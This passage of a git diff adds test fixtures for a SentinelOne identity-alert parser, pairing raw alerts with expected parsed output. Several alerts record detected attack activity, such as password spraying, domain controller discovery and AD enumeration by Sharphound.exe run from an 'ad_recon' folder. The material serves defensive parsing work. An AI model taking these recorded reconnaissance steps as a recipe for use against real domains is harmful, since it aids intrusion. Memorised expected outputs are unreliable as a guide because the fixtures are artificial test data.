\"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}", + "event": { + "category": "intrusion_detection", + "kind": "alert", + "type": "info" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "name": "Mocked api" + } + } + } +} diff --git a/SentinelOne/identity/tests/test_alert_3.json b/SentinelOne/identity/tests/test_alert_3.json new file mode 100644 index 000000000..cbc475032 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_3.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T10:09:37.779000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T10:09:37.779000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T10:09:37.779000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935359-3eda-7903-93fc-af6a0e5d0a8f", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_4.json b/SentinelOne/identity/tests/test_alert_4.json new file mode 100644 index 000000000..64efcfc10 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_4.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T10:09:17.184000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T10:09:17.184000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T10:09:17.184000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935358-ee81-7eb7-b57f-022c6f0019a9", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json new file mode 100644 index 000000000..f1339df60 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_5.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:54:58Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T09:54:58Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:54:58Z", + "file": { + "hash": { + "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" + }, + "name": "cmd.exe", + "path": "c:\\windows\\system32\\cmd.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\cmd.exe\"" + }, + "related": { + "hash": [ + "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "0193534d-63c1-7497-b854-b883425af3f5", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json new file mode 100644 index 000000000..e43c64e20 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_6.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.", + "start": "2024-11-22T09:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:51Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935347-abf7-7457-8467-e3443470e6f3", + "name": "AD Domain Computer Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json new file mode 100644 index 000000000..d4acce26a --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_7.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T09:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:51Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935347-b05a-7d28-a929-5294ee16628a", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_8.json b/SentinelOne/identity/tests/test_alert_8.json new file mode 100644 index 000000000..384a41648 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_8.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:07.655000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised for default administrator account logon anywhere in the domain.", + "start": "2024-11-22T09:45:07.655000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:07.655000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935342-d073-7ed0-8c5e-2373fc013310", + "name": "Default Admin Account Usage", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_9.json b/SentinelOne/identity/tests/test_alert_9.json new file mode 100644 index 000000000..74ab3a7f3 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_9.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:10:09.467000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T09:10:09.467000Z", + "type": "info" + }, + "@timestamp": 